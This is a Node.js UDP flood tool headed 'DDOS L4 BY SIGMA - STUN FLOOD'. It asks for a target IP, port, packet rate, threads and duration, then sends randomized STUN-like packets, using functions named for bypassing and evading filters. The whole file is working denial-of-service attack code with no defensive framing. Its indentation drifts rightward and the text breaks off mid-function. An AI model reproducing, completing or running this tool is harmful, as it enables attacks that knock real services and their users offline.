const dgram = require('dgram');
const readline = require('readline');
const { randomBytes } = require('crypto');
const os = require('os');

console.log("\n====================================");
console.log("     DDOS L4 BY SIGMA - STUN FLOOD  ");
console.log("====================================\n");

const rl = readline.createInterface({
    input: process.stdin,
        output: process.stdout
        });

        function createSTUNRequest() {
            return Buffer.concat([
                    Buffer.from([0x00, 0x01, 0x00, 0x00, 0x21, 0x12, 0xA4, 0x42]),
                            randomBytes(12)
                                ]);
                                }

                                function createBypassRequest() {
                                    return Buffer.concat([
                                            Buffer.from([0x00, 0x01, 0x00, 0x00, 0x21, 0x34, 0xB2, 0x56]),
                                                    randomBytes(24)
                                                        ]);
                                                        }

                                                        function createStealthRequest() {
                                                            return Buffer.concat([
                                                                    Buffer.from([0x01, 0x02, 0x00, 0x00, 0x21, 0x56, 0xC3, 0x78]),
                                                                            randomBytes(32)
                                                                                ]);
                                                                                }

                                                                                function createSocket() {
                                                                                    return dgram.createSocket('udp4');
                                                                                    }

                                                                                    function randomDelay(min = 5, max = 30) {
                                                                                        return Math.floor(Math.random() * (max - min + 1)) + min;
                                                                                        }

                                                                                        function obfuscateTraffic() {
                                                                                            return Math.random() > 0.5 ? createSTUNRequest() : Math.random() > 0.5 ? createBypassRequest() : createStealthRequest();
                                                                                            }

                                                                                            rl.question("Target IP: ", (ip) => {
                                                                                                rl.question("Target PORT: ", (port) => {
                                                                                                        rl.question("Requests Per Second (RPS): ", (rps) => {
                                                                                                                    rl.question("Number of Threads: ", (threads) => {
                                                                                                                                    rl.question("Duration (seconds): ", (duration) => {
                                                                                                                                                        rl.close();
                                                                                                                                                                            
                                                                                                                                                                                                port = parseInt(port, 10);
                                                                                                                                                                                                                    rps = parseInt(rps, 10);
                                                                                                                                                                                                                                        threads = parseInt(threads, 10);
                                                                                                                                                                                                                                                            duration = parseInt(duration, 10);
                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                    console.log("\n====================================");
                                                                                                                                                                                                                                                                                                                        console.log(`   ATTACKING ${ip}:${port} FOR ${duration}s  `);
                                                                                                                                                                                                                                                                                                                                            console.log("====================================\n");
                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                    const startTime = Date.now();
                                                                                                                                                                                                                                                                                                                                                                                                        let successfulPackets = 0;
                                                                                                                                                                                                                                                                                                                                                                                                                            let failedPackets = 0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    function logProgress() {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            console.log(`Status: Sent: ${successfulPackets}, Failed: ${failedPackets}`);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    if (Date.now() - startTime < duration * 1000) {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                setTimeout(logProgress, 10000);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    async function sendSTUNRequest() {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            const socket = createSocket();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            return new Promise((resolve) => {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        function sendPacket() {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        if (Date.now() - startTime >= duration * 1000) {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            socket.close();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                console.log("\n====================================");
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    console.log(`   ATTACK COMPLETED: Sent: ${successfulPackets}, Failed: ${failedPackets}  `);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        console.log("====================================\n");
                                                         
